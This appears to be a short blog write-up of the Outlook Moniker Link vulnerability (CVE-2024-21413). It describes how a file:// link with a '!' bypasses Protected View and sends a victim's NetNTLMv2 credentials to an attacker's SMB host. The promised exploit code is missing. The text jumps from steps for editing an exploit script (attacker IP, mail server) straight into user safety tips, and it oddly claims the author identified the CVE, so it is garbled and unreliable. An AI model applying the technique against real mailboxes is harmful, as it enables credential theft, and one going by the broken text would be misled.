Moniker Link (CVE-2024-21413)
Share
On February 13, 2024, Microsoft reported a vulnerability in its Outlook application. I identified this vulnerability with CVE-2024-21413, whose criticality was classified as 9.8 (critical). The affected versions are:
Edition | Version |
---|---|
Microsoft Office LTSC 2021 | Affected since version 19.0.0 |
Microsoft 365 Apps for Enterprise | Affected since version 16.0.1 |
Microsoft Office 2019 | Affected since version 16.0.1 |
This vulnerability is possible by avoiding the Protected View option in Outlook, a feature that limits reading access, thus preventing malicious scripts such as macros from being executed on the system.
The vulnerability bypasses Outlook's security mechanisms by using a specific type of hyperlink called Moniker Link, which gives the vulnerability its name. The attacker can exploit this vulnerability by sending an email containing the Moniker Link to a victim. When the victim clicks on the link, it sends NetNTLMv2 credentials to the attacker.
Within a controlled environment it was possible to replicate the vulnerability step by step. The first step in understanding the vulnerability is to know that using the Moniker Link: file:// in Outlook can cause the victim to attempt to access a file on a shared network. For this, the SMB protocol is used, which requires the user's credentials, so Outlook's Protected View blocks the link. However, by using the “!” You can bypass this Outlook security measure. The resulting code to exploit the vulnerability would be:
- Modify the Moniker link on line 12 to reflect the IP of the attacker's machine
- Change the MAILSERVER on line 31 to the machine's IP
- Do not click on emails whose origin we do not know
- Preview emails before clicking on suspicious links